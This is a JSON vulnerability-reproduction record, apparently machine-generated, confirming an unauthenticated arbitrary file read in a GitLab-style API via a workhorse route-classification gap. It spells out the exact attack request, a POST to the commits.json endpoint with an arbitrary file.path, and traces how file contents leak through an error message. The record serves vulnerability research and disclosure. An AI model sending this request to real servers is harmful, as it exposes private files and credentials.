{
  "_pruva_terminal_reconciliation": {
    "authored_artifact_closure_sha256": "1fa22f138d58526aecc6940cbf7f8471652d89374f88c84de6e6e7e3726fa4bb",
    "authored_runtime_manifest_sha256": "2da030b128e4165651cc215d24213a435ea5d328458c870f638712278561c6a3",
    "authored_verdict_sha256": "f68996b4bc8b366a776d5afb2ee34bf0f1ecd5869f432ab0f1fcce095c911ffc",
    "claim_matching": "evaluated",
    "schema_version": 2,
    "status": "completed"
  },
  "accepted_exploit_knowledge_record_ids": [
    "cac7ffdd-9141-4190-81ca-fbe1a9fa83f6"
  ],
  "attacker_controlled_input": "Unauthenticated POST http://target/api/v4/projects/<id>/repository/commits.json?file=&file.size=64&Content-Type=application/x-www-form-urlencoded&file.path=<arbitrary filesystem path> with HTTP header Content-Type: application/x-www-form-urlencoded and empty body",
  "claim_outcome": "confirmed",
  "claimed_impact_class": "info_leak",
  "claimed_surface": "api_remote",
  "crash_observed": false,
  "end_to_end_target_reached": true,
  "evidence_scope": "production_path",
  "exploit_chain_demonstrated": true,
  "exploitability_confidence": "high",
  "inferred": false,
  "observed_impact_class": "info_leak",
  "read_write_primitive_observed": true,
  "repro_result": "confirmed",
  "sanitizer_used": false,
  "trigger_path": "nginx -> gitlab-workhorse (anchored route regex on clean path fails to classify .json-suffixed commits route, proxies raw request with signed Gitlab-Workhorse header) -> Rails/Grape strips .json suffix -> API::Commits post ':id/repository/commits' (require_gitlab_workhorse! only, no authenticate!) -> CommitsBodyUploaderHelper#file_params_from_body_upload -> File.exist?/File.read(params['file.path']) -> Rack::Utils.parse_nested_query(file content) -> Rack::QueryParser::InvalidParameterError message echoed in 400 response",
  "validated_surface": "api_remote"
}
